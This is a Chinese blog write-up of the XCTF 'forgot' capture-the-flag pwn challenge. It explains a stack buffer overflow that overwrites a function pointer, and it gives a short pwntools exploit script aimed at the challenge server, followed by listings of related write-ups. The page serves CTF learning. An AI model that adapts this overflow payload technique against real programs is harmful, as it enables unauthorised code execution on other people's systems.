xctf 攻防世界-forgot writeup

最新推荐文章于 2024-06-05 16:45:03 发布
最新推荐文章于 2024-06-05 16:45:03 发布
阅读量1.7k 收藏
点赞数 1
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/95042134
版权

在这里插入图片描述
根据ida反汇编的结果可以发现有两处溢出点,第一处溢出点没什么作用,只能观察第二处溢出点
在这里插入图片描述
可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数
在这里插入图片描述
发现目标函数,接下来我的想法是利用缓冲区溢出把函数指针v12 覆盖为地址0x080486cc,接下来再控制v14的值为10, 那么 &v3+ --v14 便会指向
v12,随后cat flag

exp:

from pwn import *

context.log_level = 'debug'
c = remote("111.198.29.45", 31755)

payload = 'a'*0x44 + p32(0x080486CC) + 'a'*0x20 + p32(0x8)

c.recvuntil(">")
c.sendline("bbb")

c.sendlineafter("> ", payload)

c.interactive()

flag:

在这里插入图片描述

补充:
由于字符0x9 与0xa 是坏字符, 读到这两个字符时会造成截断, v14 的值就无法被覆盖
在这里插入图片描述

苍崎青子
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
forgot(xctf)
weixin_43868725的博客
05-26 356
0x0 程序保护和流程 保护: 流程: main() int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] int (*v3)(); // [esp+30h] [ebp-54h] int (*v4)(); // [esp+34h] [ebp-50h] int (*v5)(); // [esp+38h] [ebp-4Ch] int (*v6)(); // [esp+3Ch] [ebp-48
攻防世界--进阶区--forgot
Rt1Text的博客
06-19 273
32位/只有NX保护输入的地方,是溢出点__isoc99_scanf("%s", v2);fgets(s, 32, stdin);fgets函数对输入的数据有限制,所以不会造成溢出 可以拿到flag的函数地址 main函数的内容还挺多的,1张没截完第二张是一个for循环额...........最后一行的代码不是很好看,查了查,可以看看它的汇编应该是调用v3[--v5]的一个函数[esp+78h]就是v5的位置要是可以控制v5也就可以调用函数了在for循环内v5的值一直在发生改变,所以不能让v5进入循环让v
攻防世界XCTF-Pwn入门11题解题报告
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-05 630
如果你也想学习:黑客&网络安全的零基础攻防教程Pwn是CTF中至关重要的项目,一般来说都是Linux二进制题目,零基础的同学可以看《程序员的自我修养》,主要题型包括:缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。
攻防世界pwn题:forgot
m0_62396648的博客
06-05 486
该文件是32位的,canary和PIE保护机制没开。总览:该函数就是:v5初值为1,对v2输入一串字符。然后执行一个会根据输入的字符串而修改v5的循环语句,最后调用相应的函数。同时,发现文件里面已经含有cat flag的函数: 函数snprintf介绍: printf("cat %s", "./flag")是将cat ./flag输出到屏幕上。 snprintf(s, 0x32, "cat %s", "./flag")是最多将后
forgot [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列13
重新启程
12-23 1000
题目地址:forgot 本题是高手进阶区的第二题,恭喜大家已经进入高手行列!好假好假,哈哈哈! 废话不说,看看题目先 这个题目有很长的描述,但是都是废话,不去管他了。 照例下载附件,做下安全检查 root@mypwn:/ctf/work/python/forgot# checksec 39d012d5bbc34295855136e9662a5392 [*] '/ctf/work/py...
攻防世界forgot
qq_49853414的博客
03-19 4285
adworld_forgot 这道题单纯的考对栈里数据的掌握,以及C程序调用 int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] BYREF _DWORD v3[10]; // [esp+30h] [ebp-54h] char s[32]; // [esp+58h] [ebp-2Ch] BYREF int v5; // [esp+78h] [ebp-Ch] size_t i; // [e
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-HW-pipeline附件
11-09
附件
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF攻防世界web.doc
09-19
0x01 view-source 【题目描述】 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 【目标】 学会查看源代码 【工具】 firefox浏览器 【分析过程】 ...在url中提交后便可访问页面源码,在...
xctf 攻防世界 key
qq_41071646的博客
04-24 1483
好久没有去攻防世界玩了 主要是这段时间太忙了 有很多 杂事 缠身吧 然后没事看看堆 就。。 看自闭了 然后这道题其实还是很简单的 有很多函数 还有指令其实感觉 用od 或者ida 直接静态 就能查出来什么意思 就没有必要 去深究 里面的算法 点进去 主要的函数 发现了这个东西 注意这个 Memory 这个东西 我们往下看 这里 决定了我们的走向他就是参数之一 然...
forgot XCTF(你的疑问都可以在这里找到答案)
qq_62539372的博客
07-01 705
基本操作这里就不多说啦 直接进入正题执行文件呢 会看到是关于有限状态自动机会不会被吓到呢(纳尼!?)哈哈 其实是吓唬我们的 下面是主程序的关键部分 已知 char v2[32] 那strlen(v2)=32 for 循环可以改写为 for(i=0;i>=32;++i)注意注意 下面的switch语句 default:continue不同于default:默认为break但是如果是default:continue 就会执行continue语句 跳出此次循环 i++之后继续执行switch语句红框框圈起来的是不
forgot
qq_41071646的博客
01-20 294
这道题 看起来很复杂 我一直都很头疼不知道怎么做  后来就试探性的看看看一下栈  然后 我们   调用函数 是 距离 我是输入的距离是   32   然后 就可以写出脚本~~ #coding=utf-8 from pwn import* io=remote('111.198.29.45','31221') print io.recvuntil('>') io.sendline(...
XCTF 攻防世界】MISC 杂项 高手进阶区 embarrass
weixin_45844670的博客
08-12 457
题目链接:https://adworld.xctf.org.cn/task/answer?type=misc&number=1&grade=1&id=4932&page=1 不要看到一个流量包就想到用wireshark分析 也有可能让你用十六进制编辑器打开 直接搜索flag.txt 真的气死。。。 搜了好长时间,结果发现用010editor能直接搜到 ...
XCTF 攻防世界】杂项 misc 高手进阶区 4-1
weixin_45844670的博客
08-18 1174
下载附件得到一张照片, 用foremost分离得到了一个压缩包 打开压缩包是 两张照片肉眼看上去完全一样,我先用了stegsolve没有找到flag 猜测是盲水印 使用工具BlindWaterMark盲水印工具(到GitHub去搜) 先下载需要的库 pip install -r requirements.txt 提取图中的盲水印 (需要原图) #python2 python bwm.py decode 无水印图 有水印图 结果图 #python3 python bwmforpy3.py decod
攻防世界-Misc-新手练习记录
热门推荐
Sea_Sand息禅
04-13 1万+
ext3 下载文件,文件名是Linux,拿到kali中看下文件类型: ext3就是Linux的一个文件系统,strings查看一下有没有flag这样的字符串: flag应该就在这个flag.txt中了,把这个文件系统挂载到Linux上: mount linux /mnt 挂上去之后看一下/mnt/下的文件,用命令ls -al /mnt/,可以看到上面strings查找到的O7...
攻防世界——pwn_forgot
syk的博客
05-28 1702
checksec gdb -q ./forgot start i r exp: `#!/usr/bin/env python coding=utf-8 from pwn import * context(arch = ‘i386’, os = ‘linux’) r = remote(‘111.198.29.45’, 32048) overflow = "A"63 addr = 0x080486c...
[攻防世界]forgot
逆向萌新的博客
06-21 209
[攻防世界]forgot详解
XCTFre逆向题(二):re1
xl2655894520的博客
01-23 456
xctf逆向新手题wp
攻防世界upload1
07-28
- *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1(文件上传、前端校验)](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值